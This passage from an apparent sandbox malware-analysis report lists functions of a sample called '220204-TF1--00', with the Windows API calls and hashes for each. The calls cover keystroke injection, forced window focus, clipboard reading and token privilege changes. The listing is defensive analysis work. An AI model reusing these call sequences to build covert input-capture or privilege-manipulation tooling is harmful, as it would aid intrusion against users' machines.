                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __getptd_noexit__lock_file
                    • String ID:
                    • API String ID: 2597487223-0
                    • Opcode ID: c03b50d73b964a99221c1ba6bdbf51964997dc2777d73e49a277f11904acb964
                    • Instruction ID: e8fda2c1d737d1e5b4f8940fe50576301ed007c1db2be380e7264c9e4cf3ab0c
                    • Opcode Fuzzy Hash: c03b50d73b964a99221c1ba6bdbf51964997dc2777d73e49a277f11904acb964
                    • Instruction Fuzzy Hash: 4DF081719402099FDB91BFA48C063DE76A2AF42325F044518B514AB1D1CFB88D61DF59
                    Function 00684FAA Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                    Download Yara Rule
                    APIs
                    • FreeLibrary.KERNEL32(?,?,007462F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 00684FDE
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: FreeLibrary
                    • String ID:
                    • API String ID: 3664257935-0
                    • Opcode ID: 96987bcd57c58073c317448d95a86c14e91817f1ecfa02bf7f2ab5fd3f4c7229
                    • Instruction ID: 438ce7b9d9d57a3f8e57f0bb76671e8ddf59cda0d10e08eb1e77579524dd41a7
                    • Opcode Fuzzy Hash: 96987bcd57c58073c317448d95a86c14e91817f1ecfa02bf7f2ab5fd3f4c7229
                    • Instruction Fuzzy Hash: 30F03971505722CFCB34AF64E494852BBE2BF553293208B3EE2D782A10CB31A840DF40
                    Function 006A09D5 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 006A09F4
                      • Part of subcall function 00687D2C: _memmove.LIBCMT ref: 00687D66
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: LongNamePath_memmove
                    • String ID:
                    • API String ID: 2514874351-0
                    • Opcode ID: 75241352fce53a22da8dc0218950b619b3003dff07eacd3a8cbf75fce7c53e0e
                    • Instruction ID: d4163988a5149b6c025c9c7b23751a4ff3a6bd77ec9130b6866b87dfbce03382
                    • Opcode Fuzzy Hash: 75241352fce53a22da8dc0218950b619b3003dff07eacd3a8cbf75fce7c53e0e
                    • Instruction Fuzzy Hash: 49E0CD7690422857C720E6589C05FFA77EDDF8D790F0442B5FC0CD7205DD64AC818794
                    Function 006E9129 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __fread_nolock
                    • String ID:
                    • API String ID: 2638373210-0
                    • Opcode ID: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction ID: 739664b7077bc92d2e4b152e87d0e25a1e04aa81dd318274774e675df3b97949
                    • Opcode Fuzzy Hash: 7603a7e23398706fbe611478ecf9e3358d47b441acc83f726054c373298f7434
                    • Instruction Fuzzy Hash: D0E092B0104B405FD7349A24D8147E373E1BF06315F00081CF2AB83341EB6278418B69
                    Function 006A548B Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __wfsopen
                    • String ID:
                    • API String ID: 197181222-0
                    • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction ID: c8b885913397dcddac72bc67a5088bd6951389071ff611fe9e244a954a0e8264
                    • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                    • Instruction Fuzzy Hash: C6B0927684020C7BDE412E82EC02A593F5A9B45778F808020FB0C18162A673AAA09A89
                    Function 006A0E48 Relevance: 1.3, APIs: 1, Instructions: 94memoryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction ID: 74d596c4ff14d3e42860f057a4ccee545acaf08fa1538b26200f8ef4020c0803
                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                    • Instruction Fuzzy Hash: ED31C270A00105DFEB18EF58D4809A9F7A6FF5A300B648AA5E809DB751D731EDC1DF80
                    Function 036822A0 Relevance: 1.3, APIs: 1, Instructions: 18sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNELBASE(000001F4), ref: 036822B1
                    Memory Dump Source
                    • Source File: 00000000.00000002.1674262971.0000000003680000.00000040.00001000.00020000.00000000.sdmp, Offset: 03680000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_3680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Sleep
                    • String ID:
                    • API String ID: 3472027048-0
                    • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction ID: 13c3d2728d670d4dac60050ea7ae45c6119e82cb2fbd58be1612d48666da727d
                    • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                    • Instruction Fuzzy Hash: 84E0E67494010EDFDB00EFB8D54969E7FB4EF04701F1006A1FD01D2280D6309D508A72

                    Non-executed Functions

                    Function 0070CDAC Relevance: 75.9, APIs: 40, Strings: 3, Instructions: 637windowkeyboardCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00682612: GetWindowLongW.USER32(?,000000EB), ref: 00682623
                    • DefDlgProcW.USER32(?,0000004E,?,?,?,?,?,?), ref: 0070CE50
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0070CE91
                    • GetWindowLongW.USER32(FFFFFDD9,000000F0), ref: 0070CED6
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0070CF00
                    • SendMessageW.USER32 ref: 0070CF29
                    • _wcsncpy.LIBCMT ref: 0070CFA1
                    • GetKeyState.USER32(00000011), ref: 0070CFC2
                    • GetKeyState.USER32(00000009), ref: 0070CFCF
                    • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0070CFE5
                    • GetKeyState.USER32(00000010), ref: 0070CFEF
                    • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0070D018
                    • SendMessageW.USER32 ref: 0070D03F
                    • SendMessageW.USER32(?,00001030,?,0070B602), ref: 0070D145
                    • ImageList_SetDragCursorImage.COMCTL32(00000000,00000000,00000000,?,?,?), ref: 0070D15B
                    • ImageList_BeginDrag.COMCTL32(00000000,000000F8,000000F0), ref: 0070D16E
                    • SetCapture.USER32(?), ref: 0070D177
                    • ClientToScreen.USER32(?,?), ref: 0070D1DC
                    • ImageList_DragEnter.COMCTL32(00000000,?,?), ref: 0070D1E9
                    • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 0070D203
                    • ReleaseCapture.USER32 ref: 0070D20E
                    • GetCursorPos.USER32(?), ref: 0070D248
                    • ScreenToClient.USER32(?,?), ref: 0070D255
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0070D2B1
                    • SendMessageW.USER32 ref: 0070D2DF
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0070D31C
                    • SendMessageW.USER32 ref: 0070D34B
                    • SendMessageW.USER32(?,0000110B,00000009,00000000), ref: 0070D36C
                    • SendMessageW.USER32(?,0000110B,00000009,?), ref: 0070D37B
                    • GetCursorPos.USER32(?), ref: 0070D39B
                    • ScreenToClient.USER32(?,?), ref: 0070D3A8
                    • GetParent.USER32(?), ref: 0070D3C8
                    • SendMessageW.USER32(?,00001012,00000000,?), ref: 0070D431
                    • SendMessageW.USER32 ref: 0070D462
                    • ClientToScreen.USER32(?,?), ref: 0070D4C0
                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 0070D4F0
                    • SendMessageW.USER32(?,00001111,00000000,?), ref: 0070D51A
                    • SendMessageW.USER32 ref: 0070D53D
                    • ClientToScreen.USER32(?,?), ref: 0070D58F
                    • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 0070D5C3
                      • Part of subcall function 006825DB: GetWindowLongW.USER32(?,000000EB), ref: 006825EC
                    • GetWindowLongW.USER32(?,000000F0), ref: 0070D65F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                    • String ID: @GUI_DRAGID$F$prt
                    • API String ID: 3977979337-532765885
                    • Opcode ID: 40d854918ee7a50ad886d91d641be4770073721ef5ee19313e3de2e04e9ec52e
                    • Instruction ID: 239c9c94bee584c962cd04b2c27168636ca4561d5ef4603e7eb78e71ec16a154
                    • Opcode Fuzzy Hash: 40d854918ee7a50ad886d91d641be4770073721ef5ee19313e3de2e04e9ec52e
                    • Instruction Fuzzy Hash: 1942AD34204341EFD726CF68C844AAABBE5FF49314F14472DF6958B2E0CB79A851CB96
                    Function 0070804A Relevance: 60.1, APIs: 33, Strings: 1, Instructions: 571windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000400,00000000,00000000), ref: 0070873F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: MessageSend
                    • String ID: %d/%02d/%02d
                    • API String ID: 3850602802-328681919
                    • Opcode ID: ec098507278b7261375e6464d67704b078f3fc40ecb842fdd3afab772d455365
                    • Instruction ID: d5b0f48b021b3d394620f331297f35567c97fea5ca5be9fba891ece48846512f
                    • Opcode Fuzzy Hash: ec098507278b7261375e6464d67704b078f3fc40ecb842fdd3afab772d455365
                    • Instruction Fuzzy Hash: C012CD71500208EBEBA59F64CC49FAA7BF8EF45310F244329F955EA2E1DFB88941CB15
                    Function 0069710E Relevance: 52.3, APIs: 19, Strings: 8, Instructions: 5093COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: _memmove$_memset
                    • String ID: 0ws$DEFINE$Oai$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                    • API String ID: 1357608183-3573026870
                    • Opcode ID: 6bb2ee878fa936465fd24d1ed8625a575a75d6c5c26c1560a1c67c939997e795
                    • Instruction ID: 2a665662c19d1a1b5b591787f082b840c2bcc9c8d69a66b8ccbb68bc0abd244b
                    • Opcode Fuzzy Hash: 6bb2ee878fa936465fd24d1ed8625a575a75d6c5c26c1560a1c67c939997e795
                    • Instruction Fuzzy Hash: 67937E71E042169BDF24CF58C891AEDB7B2FF58710F25816AE955AB381E7709E82CB40
                    Function 00684A35 Relevance: 43.9, APIs: 24, Strings: 1, Instructions: 131keyboardthreadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • GetForegroundWindow.USER32(00000000,?), ref: 00684A3D
                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 006BDA8E
                    • IsIconic.USER32(?), ref: 006BDA97
                    • ShowWindow.USER32(?,00000009), ref: 006BDAA4
                    • SetForegroundWindow.USER32(?), ref: 006BDAAE
                    • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 006BDAC4
                    • GetCurrentThreadId.KERNEL32 ref: 006BDACB
                    • GetWindowThreadProcessId.USER32(?,00000000), ref: 006BDAD7
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 006BDAE8
                    • AttachThreadInput.USER32(?,00000000,00000001), ref: 006BDAF0
                    • AttachThreadInput.USER32(00000000,?,00000001), ref: 006BDAF8
                    • SetForegroundWindow.USER32(?), ref: 006BDAFB
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 006BDB10
                    • keybd_event.USER32(00000012,00000000), ref: 006BDB1B
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 006BDB25
                    • keybd_event.USER32(00000012,00000000), ref: 006BDB2A
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 006BDB33
                    • keybd_event.USER32(00000012,00000000), ref: 006BDB38
                    • MapVirtualKeyW.USER32(00000012,00000000), ref: 006BDB42
                    • keybd_event.USER32(00000012,00000000), ref: 006BDB47
                    • SetForegroundWindow.USER32(?), ref: 006BDB4A
                    • AttachThreadInput.USER32(?,?,00000000), ref: 006BDB71
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                    • String ID: Shell_TrayWnd
                    • API String ID: 4125248594-2988720461
                    • Opcode ID: 6df518e624066c0dd0585920eb0273d20ac87745bd9324d6f96e555440575664
                    • Instruction ID: 69dfedb1f736c73b88a6a6520ef1f38fe6988760d462abf37134b268c8333137
                    • Opcode Fuzzy Hash: 6df518e624066c0dd0585920eb0273d20ac87745bd9324d6f96e555440575664
                    • Instruction Fuzzy Hash: 8D31D6B1A40318BFEB306F619C49FBF7E6DEB44B50F118125FA00EA1D0DAB55C51ABA4
                    Function 006D8858 Relevance: 35.2, APIs: 17, Strings: 3, Instructions: 224COMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 006D8CC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 006D8D0D
                      • Part of subcall function 006D8CC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 006D8D3A
                      • Part of subcall function 006D8CC3: GetLastError.KERNEL32 ref: 006D8D47
                    • _memset.LIBCMT ref: 006D889B
                    • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?,?,?,?,00000001,?,?), ref: 006D88ED
                    • CloseHandle.KERNEL32(?), ref: 006D88FE
                    • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 006D8915
                    • GetProcessWindowStation.USER32 ref: 006D892E
                    • SetProcessWindowStation.USER32(00000000), ref: 006D8938
                    • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 006D8952
                      • Part of subcall function 006D8713: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,006D8851), ref: 006D8728
                      • Part of subcall function 006D8713: CloseHandle.KERNEL32(?,?,006D8851), ref: 006D873A
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLookupPrivilegeValue_memset
                    • String ID: $default$winsta0
                    • API String ID: 2063423040-1027155976
                    • Opcode ID: 44b510b34f3f0d2270e1715cb2408f45823ebc21e5705b433a92f62006b24b7c
                    • Instruction ID: 723afc10a345a97d5e42f48d6de5e408dfadd67fae6e8704e5c4dcfa45bc4103
                    • Opcode Fuzzy Hash: 44b510b34f3f0d2270e1715cb2408f45823ebc21e5705b433a92f62006b24b7c
                    • Instruction Fuzzy Hash: 7B813A71D01249AFDF21DFA4DC49AEEBB7AAF04304F08416AF910A7361DF758E149B64
                    Function 006F425A Relevance: 30.2, APIs: 20, Instructions: 167clipboardCOMMON
                    Download Yara Rule
                    APIs
                    • OpenClipboard.USER32(0070F910), ref: 006F4284
                    • IsClipboardFormatAvailable.USER32(0000000D), ref: 006F4292
                    • GetClipboardData.USER32(0000000D), ref: 006F429A
                    • CloseClipboard.USER32 ref: 006F42A6
                    • GlobalLock.KERNEL32(00000000), ref: 006F42C2
                    • CloseClipboard.USER32 ref: 006F42CC
                    • GlobalUnlock.KERNEL32(00000000,00000000), ref: 006F42E1
                    • IsClipboardFormatAvailable.USER32(00000001), ref: 006F42EE
                    • GetClipboardData.USER32(00000001), ref: 006F42F6
                    • GlobalLock.KERNEL32(00000000), ref: 006F4303
                    • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 006F4337
                    • CloseClipboard.USER32 ref: 006F4447
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                    • String ID:
                    • API String ID: 3222323430-0
                    • Opcode ID: a42f09f2fb545d195b5e5639660715c7c99cb210c38a1130754e56aab29bf478
                    • Instruction ID: 10f50a9c918cbee7e79701b6c9583bd75594dffe2618719b890f508b9fed3c52
                    • Opcode Fuzzy Hash: a42f09f2fb545d195b5e5639660715c7c99cb210c38a1130754e56aab29bf478
                    • Instruction Fuzzy Hash: 58518D35204205ABD310FF64DC86FBF77AAAF84B00F10862DF656D26A1DF74D9058B6A
                    Function 006EC9C7 Relevance: 28.3, APIs: 13, Strings: 3, Instructions: 280timefileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?), ref: 006EC9F8
                    • FindClose.KERNEL32(00000000), ref: 006ECA4C
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006ECA71
                    • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 006ECA88
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 006ECAAF
                    • __swprintf.LIBCMT ref: 006ECAFB
                    • __swprintf.LIBCMT ref: 006ECB3E
                      • Part of subcall function 00687F41: _memmove.LIBCMT ref: 00687F82
                    • __swprintf.LIBCMT ref: 006ECB92
                      • Part of subcall function 006A38D8: __woutput_l.LIBCMT ref: 006A3931
                    • __swprintf.LIBCMT ref: 006ECBE0
                      • Part of subcall function 006A38D8: __flsbuf.LIBCMT ref: 006A3953
                      • Part of subcall function 006A38D8: __flsbuf.LIBCMT ref: 006A396B
                    • __swprintf.LIBCMT ref: 006ECC2F
                    • __swprintf.LIBCMT ref: 006ECC7E
                    • __swprintf.LIBCMT ref: 006ECCCD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_680000_220204-TF1--00.jbxd
                    Similarity
                    • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                    • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                    • API String ID: 3953360268-2428617273
                    • Opcode ID: 2088ee5bde9bcc38cb89d73a2f655db2b1fd911057d06892a9ba1a82a4ededf8
                    • Instruction ID: 94e0a662f87a91d35c179efa704aa7481c62cd3f152643c147fb64d701d900ad
                    • Opcode Fuzzy Hash: 2088ee5bde9bcc38cb89d73a2f655db2b1fd911057d06892a9ba1a82a4ededf8
                    • Instruction Fuzzy Hash: E8A15CB1408304ABC754FBA5C886DAFB7EDBF94704F444A2DF586C2191EB34DA09CB66
                    Function 006EF200 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                    Download Yara Rule
                    APIs
                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 006EF221
                    • _wcscmp.LIBCMT ref: 006EF236
                    • _wcscmp.LIBCMT ref: 006EF24D
                    • GetFileAttributesW.KERNEL32(?), ref: 006EF25F
                    • SetFileAttributesW.KERNEL32(?,?), ref: 006EF279
                    • FindNextFileW.KERNEL32(00000000,?), ref: 006EF291
                    • FindClose.KERNEL32(00000000), ref: 006EF29C
                    • FindFirstFileW.KERNEL32(*.*,?), ref: 006EF2B8
                    • _wcscmp.LIBCMT ref: 006EF2DF
                    • _wcscmp.LIBCMT ref: 006EF2F6
                    • SetCurrentDirectoryW.KERNEL32(?), ref: 006EF308
                    • SetCurrentDirectoryW.KERNEL32(0073A5A0), ref: 006EF326
                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 006EF330
                    • FindClose.KERNEL32(00000000), ref: 006EF33D
                    • FindClose.KERNEL32(00000000), ref: 006EF34F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1673751140.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                    • Associated: 00000000.00000002.1673739282.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.000000000070F000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673791806.0000000000735000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673823909.000000000073F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1673836454.0000000000748000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
